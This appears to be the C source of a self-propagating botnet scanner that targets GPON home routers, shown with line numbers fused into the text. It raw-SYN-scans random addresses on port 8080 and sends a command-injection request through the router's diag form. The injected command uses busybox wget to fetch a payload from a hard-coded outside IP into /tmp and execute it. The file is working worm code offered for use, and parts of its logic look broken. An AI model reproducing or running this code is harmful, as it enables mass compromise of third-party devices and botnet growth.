Path: blob/master/Botnets/Self Reps/GPON/gpon8080_scanner.c
5038 views
#ifdef SELFREP12#define _GNU_SOURCE34#ifdef DEBUG5#include <stdio.h>6#endif7#include <unistd.h>8#include <stdlib.h>9#include <sys/socket.h>10#include <arpa/inet.h>11#include <sys/select.h>12#include <sys/types.h>13#include <time.h>14#include <fcntl.h>15#include <signal.h>16#include <errno.h>17#include <string.h>18#include <linux/ip.h>19#include <linux/tcp.h>2021#include "includes.h"22#include "gpon8080_scanner.h"23#include "table.h"24#include "rand.h"25#include "util.h"26#include "checksum.h"2728int gpon8080_scanner_pid = 0, gpon8080_rsck = 0, gpon8080_rsck_out = 0, gpon8080_auth_table_len = 0;29char gpon8080_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};30struct gpon8080_scanner_auth *gpon8080_auth_table = NULL;31struct gpon8080_scanner_connection *conn_table;32uint16_t gpon8080_gpon8080_auth_table_max_weight = 0;33uint32_t gpon8080_fake_time = 0;34int gpon8080_ranges[] = {189,187,201};35int gpon8080_recv_strip_null(int sock, void *buf, int len, int flags)36{37int ret = recv(sock, buf, len, flags);3839if(ret > 0)40{41int i = 0;4243for(i = 0; i < ret; i++)44{45if(((char *)buf)[i] == 0x00)46{47((char *)buf)[i] = 'A';48}49}50}5152return ret;53}5455void gpon8080_scanner(void)56{57int i = 0;58uint16_t source_port;59struct iphdr *iph;60struct tcphdr *tcph;6162// Let parent continue on main thread63gpon8080_scanner_pid = fork();64if(gpon8080_scanner_pid > 0 || gpon8080_scanner_pid == -1)65return;6667LOCAL_ADDR = util_local_addr();6869rand_init();70gpon8080_fake_time = time(NULL);71conn_table = calloc(GPON8080_SCANNER_MAX_CONNS, sizeof(struct gpon8080_scanner_connection));72for(i = 0; i < GPON8080_SCANNER_MAX_CONNS; i++)73{74conn_table[i].state = GPON8080_SC_CLOSED;75conn_table[i].fd = -1;76conn_table[i].credential_index = 0;77}7879// Set up raw socket scanning and payload80if((gpon8080_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)81{82#ifdef DEBUG83printf("[scanner] failed to initialize raw socket, cannot scan\n");84#endif85exit(0);86}87fcntl(gpon8080_rsck, F_SETFL, O_NONBLOCK | fcntl(gpon8080_rsck, F_GETFL, 0));88i = 1;89if(setsockopt(gpon8080_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)90{91#ifdef DEBUG92printf("[scanner] failed to set IP_HDRINCL, cannot scan\n");93#endif94close(gpon8080_rsck);95exit(0);96}9798do99{100source_port = rand_next() & 0xffff;101}102while(ntohs(source_port) < 1024);103104iph = (struct iphdr *)gpon8080_scanner_rawpkt;105tcph = (struct tcphdr *)(iph + 1);106107// Set up IPv4 header108iph->ihl = 5;109iph->version = 4;110iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));111iph->id = rand_next();112iph->ttl = 64;113iph->protocol = IPPROTO_TCP;114115// Set up TCP header116tcph->dest = htons(8080);117tcph->source = source_port;118tcph->doff = 5;119tcph->window = rand_next() & 0xffff;120tcph->syn = TRUE;121122#ifdef DEBUG123printf("[scanner] scanner process initialized. scanning started.\n");124#endif125126// Main logic loop127while(TRUE)128{129fd_set fdset_rd, fdset_wr;130struct gpon8080_scanner_connection *conn;131struct timeval tim;132int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;133134// Spew out SYN to try and get a response135if(gpon8080_fake_time != last_spew)136{137last_spew = gpon8080_fake_time;138139for(i = 0; i < GPON8080_SCANNER_RAW_PPS; i++)140{141struct sockaddr_in paddr = {0};142struct iphdr *iph = (struct iphdr *)gpon8080_scanner_rawpkt;143struct tcphdr *tcph = (struct tcphdr *)(iph + 1);144145iph->id = rand_next();146iph->saddr = LOCAL_ADDR;147iph->daddr = get_random_gpon8080_ip();148iph->check = 0;149iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));150151tcph->dest = htons(8080);152tcph->seq = iph->daddr;153tcph->check = 0;154tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));155156paddr.sin_family = AF_INET;157paddr.sin_addr.s_addr = iph->daddr;158paddr.sin_port = tcph->dest;159160sendto(gpon8080_rsck, gpon8080_scanner_rawpkt, sizeof(gpon8080_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));161}162}163164// Read packets from raw socket to get SYN+ACKs165last_avail_conn = 0;166while(TRUE)167{168int n = 0;169char dgram[1514];170struct iphdr *iph = (struct iphdr *)dgram;171struct tcphdr *tcph = (struct tcphdr *)(iph + 1);172struct gpon8080_scanner_connection *conn;173174errno = 0;175n = recvfrom(gpon8080_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);176if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)177break;178179if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))180continue;181if(iph->daddr != LOCAL_ADDR)182continue;183if(iph->protocol != IPPROTO_TCP)184continue;185if(tcph->source != htons(8080))186continue;187if(tcph->dest != source_port)188continue;189if(!tcph->syn)190continue;191if(!tcph->ack)192continue;193if(tcph->rst)194continue;195if(tcph->fin)196continue;197if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)198continue;199200conn = NULL;201for(n = last_avail_conn; n < GPON8080_SCANNER_MAX_CONNS; n++)202{203if(conn_table[n].state == GPON8080_SC_CLOSED)204{205conn = &conn_table[n];206last_avail_conn = n;207break;208}209}210211// If there were no slots, then no point reading any more212if(conn == NULL)213break;214215conn->dst_addr = iph->saddr;216conn->dst_port = tcph->source;217gpon8080_setup_connection(conn);218}219220FD_ZERO(&fdset_rd);221FD_ZERO(&fdset_wr);222223for(i = 0; i < GPON8080_SCANNER_MAX_CONNS; i++)224{225int timeout = 5;226227conn = &conn_table[i];228//timeout = (conn->state > GPON8080_SC_CONNECTING ? 30 : 5);229230if(conn->state != GPON8080_SC_CLOSED && (gpon8080_fake_time - conn->last_recv) > timeout)231{232#ifdef DEBUG233printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);234#endif235236close(conn->fd);237conn->fd = -1;238conn->state = GPON8080_SC_CLOSED;239free(conn->credentials);240conn->credential_index = 0;241util_zero(conn->rdbuf, sizeof(conn->rdbuf));242243continue;244}245246if(conn->state == GPON8080_SC_CONNECTING || conn->state == GPON8080_SC_EXPLOIT_STAGE2 || conn->state == GPON8080_SC_EXPLOIT_STAGE3)247{248FD_SET(conn->fd, &fdset_wr);249if(conn->fd > mfd_wr)250mfd_wr = conn->fd;251}252else if(conn->state != GPON8080_SC_CLOSED)253{254FD_SET(conn->fd, &fdset_rd);255if(conn->fd > mfd_rd)256mfd_rd = conn->fd;257}258}259260tim.tv_usec = 0;261tim.tv_sec = 3;262nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);263gpon8080_fake_time = time(NULL);264265for(i = 0; i < GPON8080_SCANNER_MAX_CONNS; i++)266{267conn = &conn_table[i];268269if(conn->fd == -1)270continue;271272if(FD_ISSET(conn->fd, &fdset_wr))273{274int err = 0, ret = 0;275socklen_t err_len = sizeof(err);276277ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);278if(err == 0 && ret == 0)279{280281if(conn->state == GPON8080_SC_EXPLOIT_STAGE2)282{283#ifdef DEBUG284printf("[scanner] FD%d request sent to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);285#endif286287// build stage 2 payload288util_strcpy(conn->payload_buf, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://217.61.6.127/gpon+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0");289290// actually send the payload291send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);292293// clear the payload buffer294util_zero(conn->payload_buf, sizeof(conn->payload_buf));295296// clear the socket buffer297util_zero(conn->rdbuf, sizeof(conn->rdbuf));298299conn->state = GPON8080_SC_CLOSED;300close(conn->fd);301conn->fd = -1;302303continue;304}305else if(conn->state == GPON8080_SC_EXPLOIT_STAGE3)306{307conn->state = GPON8080_SC_CLOSED;308309continue;310}311else312{313conn->credentials = malloc(256);314conn->state = GPON8080_SC_EXPLOIT_STAGE2;315}316}317else318{319#ifdef DEBUG320printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);321#endif322323close(conn->fd);324conn->fd = -1;325conn->state = GPON8080_SC_CLOSED;326327continue;328}329}330331if(FD_ISSET(conn->fd, &fdset_rd))332{333while(TRUE)334{335int ret = 0;336337if(conn->state == GPON8080_SC_CLOSED)338break;339close(conn->fd);340341if(conn->rdbuf_pos == GPON8080_SCANNER_RDBUF_SIZE)342{343memmove(conn->rdbuf, conn->rdbuf + GPON8080_SCANNER_HACK_DRAIN, GPON8080_SCANNER_RDBUF_SIZE - GPON8080_SCANNER_HACK_DRAIN);344conn->rdbuf_pos -= GPON8080_SCANNER_HACK_DRAIN;345}346347errno = 0;348ret = gpon8080_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, GPON8080_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);349if(ret == 0)350{351#ifdef DEBUG352printf("[scanner] FD%d connection gracefully closed (stage %d)\n", conn->fd, conn->state);353#endif354errno = ECONNRESET;355ret = -1;356}357if(ret == -1)358{359if(errno != EAGAIN && errno != EWOULDBLOCK)360{361if(conn->state == GPON8080_SC_EXPLOIT_STAGE2)362{363#ifdef DEBUG364printf("[scanner] FD%d resetting connection preparing to continue with stage 2 of the exploit\n", conn->fd);365#endif366close(conn->fd);367gpon8080_setup_connection(conn);368continue;369}370371close(conn->fd);372conn->fd = -1;373conn->state = GPON8080_SC_CLOSED;374free(conn->credentials);375conn->credential_index = 0;376util_zero(conn->rdbuf, sizeof(conn->rdbuf));377}378break;379}380381conn->rdbuf_pos += ret;382conn->last_recv = gpon8080_fake_time;383384int len = util_strlen(conn->rdbuf);385conn->rdbuf[len] = 0;386387if(conn->state == GPON8080_SC_GET_CREDENTIALS)388{389char *out = strtok(conn->rdbuf, " ");390391while(out != NULL)392{393if(strstr(out, ""))394{395#ifdef DEBUG396printf("[scanner] FD%d parsing credentials...\n", conn->fd);397#endif398399memmove(out, out + 11, strlen(out));400401int i = 0;402403for(i = 0; i < strlen(out); i++)404{405if(out[i] == ';' || out[i] == '"' || out[i] == ' ')406out[i] = 0;407}408409conn->credentials[conn->credential_index] = strdup(out);410conn->credential_index++;411412}413414out = strtok(NULL, " ");415}416}417418if(conn->credentials[0] == NULL && conn->credentials[1] == NULL)419{420#ifdef DEBUG421printf("[scanner] FD%d failed to retrieve credentials\n", conn->fd);422#endif423close(conn->fd);424conn->fd = -1;425conn->state = GPON8080_SC_CLOSED;426free(conn->credentials);427conn->credential_index = 0;428util_zero(conn->rdbuf, sizeof(conn->rdbuf));429}430else431{432#ifdef DEBUG433printf("[scanner] FD%d retrieved user: %s, pass: %s changing exploit stages\n", conn->fd, conn->credentials[0], conn->credentials[1]);434#endif435436close(conn->fd);437conn->fd = -1;438conn->state = GPON8080_SC_EXPLOIT_STAGE2;439conn->credential_index = 0;440util_zero(conn->rdbuf, sizeof(conn->rdbuf));441}442}443}444}445}446}447448void gpon8080_kill(void)449{450kill(gpon8080_scanner_pid, 9);451}452453static void gpon8080_setup_connection(struct gpon8080_scanner_connection *conn)454{455struct sockaddr_in addr = {0};456457if(conn->fd != -1)458close(conn->fd);459460if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)461{462#ifdef DEBUG463printf("[scanner] failed to call socket()\n");464#endif465return;466}467468conn->rdbuf_pos = 0;469util_zero(conn->rdbuf, sizeof(conn->rdbuf));470471fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));472473addr.sin_family = AF_INET;474addr.sin_addr.s_addr = conn->dst_addr;475addr.sin_port = conn->dst_port;476477conn->last_recv = gpon8080_fake_time;478479if(conn->state == GPON8080_SC_EXPLOIT_STAGE2 || conn->state == GPON8080_SC_EXPLOIT_STAGE3)480{481}482else483{484conn->state = GPON8080_SC_CONNECTING;485}486487connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));488}489490static ipv4_t get_random_gpon8080_ip(void)491{492uint32_t tmp;493uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;494495do496{497int gpon8080_scan = rand() % (sizeof(gpon8080_ranges)/sizeof(char *));498tmp = rand_next();499500o1 = gpon8080_ranges[gpon8080_scan];501o2 = (tmp >> 8) & 0xff;502o3 = (tmp >> 16) & 0xff;503o4 = (tmp >> 24) & 0xff;504}505while(o1 == 127 || o1 == 0);506507return INET_ADDR(o1,o2,o3,o4);508}509510#endif511512513514